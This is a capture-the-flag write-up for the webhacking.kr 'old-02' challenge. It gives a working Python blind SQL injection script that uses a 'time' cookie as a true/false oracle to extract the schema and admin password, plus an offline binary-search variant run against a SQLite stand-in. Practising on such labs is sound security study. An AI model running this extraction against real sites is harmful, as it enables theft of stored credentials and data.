old-02 (500)
Viewing the page source gives the following:
<!--
2020-01-16 04:23:24
-->
<h2>Restricted area</h2>Hello stranger. Your IP is logging...<!-- if you access admin.php i will kick your ass -->
Visiting https://webhacking.kr/challenge/web-02/admin.php shows a form that asks for a password.
Back on the main page, checking the cookies reveals one named time.
When the cookie value is set to true, the timestamp in the page source becomes 2070-01-01 09:00:01; when it is set to false, it becomes 2070-01-01 09:00:00.
The one-second difference suggests that the server evaluates the cookie value as a SQL expression and adds the result (1 or 0) to a base timestamp, which gives us a boolean oracle: any condition we put in the cookie is answered by which of the two timestamps is rendered.
From this we can infer that the challenge is a Blind SQL Injection problem.
Written in Python, the extraction looks like this (the comment above each function records the value it returned on the challenge):
import urllib.request

URL = 'https://webhacking.kr/challenge/web-02/'
# Timestamp rendered in the HTML comment when the injected condition is true
TRUE_PHRASE = '2070-01-01 09:00:01'


def query(payload):
    """Send a SQL condition in the time cookie; True if the page shows the 'true' timestamp."""
    req = urllib.request.Request(URL)
    req.add_header('Cookie', 'time=' + payload)
    r = urllib.request.urlopen(req)
    content = r.read().decode('utf-8')
    return TRUE_PHRASE in content


# Result on the challenge: 6
def find_db_name_len():
    # Count up until LENGTH(DATABASE()) matches
    db_name_len = 1
    while not query('LENGTH(DATABASE()) = {}'.format(db_name_len)):
        db_name_len += 1
    print('db_name_len: {}'.format(db_name_len))
    return db_name_len


# Result on the challenge: chall2
def find_db_name():
    # Recover each character by testing ASCII(SUBSTR(...)) against 0..127
    db_name_len = find_db_name_len()
    db_name = ''
    for pos in range(1, db_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR(DATABASE(), {}, 1)) = {}'.format(pos, character)):
                db_name += chr(character)
                break
    print('db_name: {}'.format(db_name))
    return db_name


# Result on the challenge: 13
def find_table_name_length(db_name):
    # First table of the current schema, via INFORMATION_SCHEMA.TABLES
    table_name_len = 1
    while not query('LENGTH((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA="{}" LIMIT 0, 1)) = {}'.format(db_name, table_name_len)):
        table_name_len += 1
    print('table_name_len: {}'.format(table_name_len))
    return table_name_len


# Result on the challenge: admin_area_pw
def find_table_name():
    db_name = find_db_name()
    table_name_len = find_table_name_length(db_name)
    table_name = ''
    for pos in range(1, table_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = "{}" LIMIT 0, 1), {}, 1)) = {}'.format(db_name, pos, character)):
                table_name += chr(character)
                break
    print('table_name: {}'.format(table_name))
    return table_name


# Result on the challenge: 2
def find_column_name_length(table_name):
    # First column of the table, via INFORMATION_SCHEMA.COLUMNS
    column_name_len = 1
    while not query('LENGTH((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1)) = {}'.format(table_name, column_name_len)):
        column_name_len += 1
    print('column_name_len: {}'.format(column_name_len))
    return column_name_len


# Result on the challenge: pw
def find_column_name(table_name):
    column_name_len = find_column_name_length(table_name)
    column_name = ''
    for pos in range(1, column_name_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME="{}" LIMIT 0, 1), {}, 1)) = {}'.format(table_name, pos, character)):
                column_name += chr(character)
                break
    print('column_name: {}'.format(column_name))
    return column_name


# Result on the challenge: 17
def find_pw_length(column_name, table_name):
    pw_len = 1
    while not query('LENGTH((SELECT {} FROM {} LIMIT 0, 1)) = {}'.format(column_name, table_name, pw_len)):
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len


# Result on the challenge: kudos_to_beistlab
def find_pw():
    # Chain the steps: schema -> table -> column -> value
    table_name = find_table_name()
    column_name = find_column_name(table_name)
    pw_len = find_pw_length(column_name, table_name)
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            if query('ASCII(SUBSTR((SELECT {} FROM {} LIMIT 0, 1), {}, 1)) = {}'.format(column_name, table_name, pos, character)):
                pw += chr(character)
                break
    print('pw: {}'.format(pw))


find_pw()
Running the code shows that pw is kudos_to_beistlab.
Entering this value into the form at https://webhacking.kr/challenge/web-02/admin.php and submitting it solves the challenge.
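The script above tests every character with `= 0`, `= 1`, ... `= 127` in turn, so a character like `k` (ASCII 107) costs 108 requests, and the whole run takes several thousand round trips. The same boolean oracle answers `>` just as well as `=`, which lets each character be found in exactly 7 requests by binary search over the 0..127 range. The block below is an added example, not part of the original writeup: it runs the binary-search variant against a constructed in-memory SQLite stand-in for the admin_area_pw table so it works offline. The stand-in's `query()` plays the role of the time cookie (it returns whether the injected condition is true); SQLite spells MySQL's `ASCII()` as `unicode()`, and `LIMIT 1` replaces `LIMIT 0, 1`. The secret value, the `max_len` bound and the request counter are assumptions made for the example.

```python
import sqlite3

# Constructed for this example: a local stand-in for the challenge's
# admin_area_pw table, so the extraction can be exercised offline.
SECRET = 'kudos_to_beistlab'
TARGET = '(SELECT pw FROM admin_area_pw LIMIT 1)'


def make_oracle():
    """Return (query, counter).

    query(condition) stands in for sending `condition` in the time cookie and
    checking which of the two timestamps the page renders: True if the SQL
    condition is true, False otherwise. counter['requests'] counts calls.
    """
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE admin_area_pw (pw TEXT)')
    conn.execute('INSERT INTO admin_area_pw VALUES (?)', (SECRET,))
    counter = {'requests': 0}

    def query(condition):
        counter['requests'] += 1
        # The server would evaluate the condition in its own query; here the
        # stand-in evaluates it directly as a SELECT expression (0 or 1).
        return bool(conn.execute('SELECT ' + condition).fetchone()[0])

    return query, counter


def extract_length(query, expr, max_len=64):
    """Find LENGTH(expr) by binary search on 'LENGTH(expr) > mid'."""
    # One request up front so an over-long value fails loudly instead of
    # being silently truncated to max_len.
    if query('LENGTH({}) > {}'.format(expr, max_len)):
        raise ValueError('value is longer than max_len={}'.format(max_len))
    lo, hi = 0, max_len
    while lo < hi:  # invariant: lo <= LENGTH(expr) <= hi
        mid = (lo + hi) // 2
        if query('LENGTH({}) > {}'.format(expr, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_char(query, expr, pos):
    """Recover the character at 1-based position `pos` in 7 requests.

    The search space 0..127 has 128 values, so halving it always takes
    exactly 7 comparisons. unicode() is SQLite's name for MySQL's ASCII().
    """
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if query('unicode(substr({}, {}, 1)) > {}'.format(expr, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def recover(query, expr=TARGET):
    """Extract the full value of `expr` through the boolean oracle."""
    length = extract_length(query, expr)
    return ''.join(extract_char(query, expr, pos) for pos in range(1, length + 1))


if __name__ == '__main__':
    query, counter = make_oracle()
    value = recover(query)
    print('recovered: {} in {} requests'.format(value, counter['requests']))
```

For the 17-character secret this takes 7 requests for the length (1 bound check plus 6 halvings of 0..64) and 7 per character, 126 in total, against the roughly 1,500 that the `= n` scan needs for the same value. Against the real challenge, `query()` would be the HTTP version from the script above and the `unicode(...)` call would go back to `ASCII(...)`.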